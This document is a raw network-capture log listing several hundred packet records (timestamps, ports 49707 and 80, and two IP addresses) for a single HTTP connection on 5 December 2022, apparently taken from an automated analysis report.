Dec 5, 2022 01:32:57.111846924 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.111872911 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.111881018 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.111922979 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.112166882 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.112205982 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.112240076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.112251997 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.112262011 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.112294912 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.112294912 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.112335920 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.112344027 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.112373114 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.112376928 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.112417936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.112421989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.112458944 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.112459898 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.112497091 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.113240004 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.113281965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.113313913 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.113321066 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.113349915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.113362074 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.113368034 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.113404036 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.113404036 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.113445044 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.113445997 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.113486052 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.113487005 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.113528013 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.113559008 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.113650084 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114285946 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114326954 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114340067 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114367008 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114370108 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114409924 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114409924 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114451885 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114451885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114494085 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114494085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114535093 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114535093 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114574909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114574909 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114617109 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114794016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114835024 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114844084 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114888906 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114896059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114943027 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.114948988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114968061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114984989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.114986897 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115004063 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.115010023 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115020990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115024090 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.115044117 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115062952 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115811110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.115844011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.115859985 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115861893 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.115880966 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.115888119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115900993 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.115907907 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115919113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115921974 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.115940094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.115942001 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115959883 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.115963936 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115988016 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.115998030 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.116863012 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.116880894 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.116898060 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.116918087 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.116935015 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.116935015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.116955996 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.116971970 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.116974115 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.116992950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.116997004 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.117007017 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.117012024 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.117032051 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.117041111 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.117060900 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.117072105 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.118041039 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.118058920 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.118076086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.118093967 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.118107080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.118113995 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.118132114 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.118136883 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.118150949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.118163109 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.118170977 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.118194103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.118205070 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.118226051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.118948936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.118968010 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.118985891 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119004011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119014978 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.119023085 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119043112 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119045019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.119061947 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119080067 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119081020 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.119102001 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.119127035 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.119455099 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119473934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119492054 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119508982 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.119510889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119527102 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.119532108 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119545937 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.119551897 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119570971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119579077 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.119590044 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.119612932 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.119627953 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.120574951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.120594978 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.120611906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.120630026 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.120647907 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.120661974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.120666027 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.120682955 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.120685101 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.120706081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.120723963 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.120738983 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.120763063 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.121572971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.121592999 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.121609926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.121628046 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.121645927 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.121660948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.121665001 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.121675968 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.121701956 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.121706963 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.121721983 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.121746063 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.121772051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.122186899 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.122205973 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.122235060 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.122252941 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.122637033 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.122657061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.122677088 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.122694016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.122701883 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.122714043 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.122733116 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.122737885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.122752905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.122761011 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.122773886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.122795105 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.122809887 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.123158932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.123178005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.123224974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.123229027 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.123250008 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.123267889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.123271942 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.123297930 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.123310089 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.123904943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.123924017 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.123940945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.123969078 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.123996019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.124260902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.124279976 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.124303102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.124324083 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.124355078 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.125525951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.125543118 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.125559092 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.125574112 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.125588894 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.125590086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.125607014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.125637054 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.125641108 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.125653982 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.125663042 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.125672102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.125689030 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.125694990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.125727892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.125746012 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126038074 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126055002 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126082897 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126108885 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126110077 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126452923 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126483917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126501083 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126518011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126524925 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126538038 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126542091 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126559973 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126562119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126576900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126580000 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126595020 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126599073 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126611948 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.126616955 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126627922 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.126647949 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.127650976 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.127669096 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.127685070 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.127701044 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.127707005 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.127748013 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.127880096 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128051996 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.128519058 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128535032 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128575087 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.128678083 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128695965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128710985 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128726006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128736019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.128741980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128758907 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128767014 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.128774881 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128778934 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.128792048 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128804922 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.128834009 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.128850937 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.128890038 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.129195929 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.129246950 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.129348040 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.129365921 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.129381895 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.129395008 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.129400015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.129416943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.129416943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.129427910 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.129435062 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.129445076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.129451990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.129460096 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.129470110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.129482031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.129487991 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.129493952 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.129504919 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.129529953 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.130022049 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130039930 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130054951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130072117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130073071 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.130089998 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130098104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.130106926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130124092 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130137920 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.130141020 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130153894 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.130187035 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.130513906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130530119 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130543947 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130567074 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130572081 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.130583048 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130594969 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.130599976 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.130624056 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.130641937 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.130990028 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.131007910 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.131051064 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.131072044 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.131608963 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.131627083 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.131642103 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.131659031 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.131675005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.131690979 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.131691933 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.131704092 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.131711006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.131730080 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.131737947 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.131759882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.131782055 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.132675886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.132693052 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.132707119 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.132721901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.132736921 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.132750988 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.132752895 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.132770061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.132785082 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.132785082 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.132797003 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.132827997 CET	49707	80	192.168.2.3	77.73.133.23
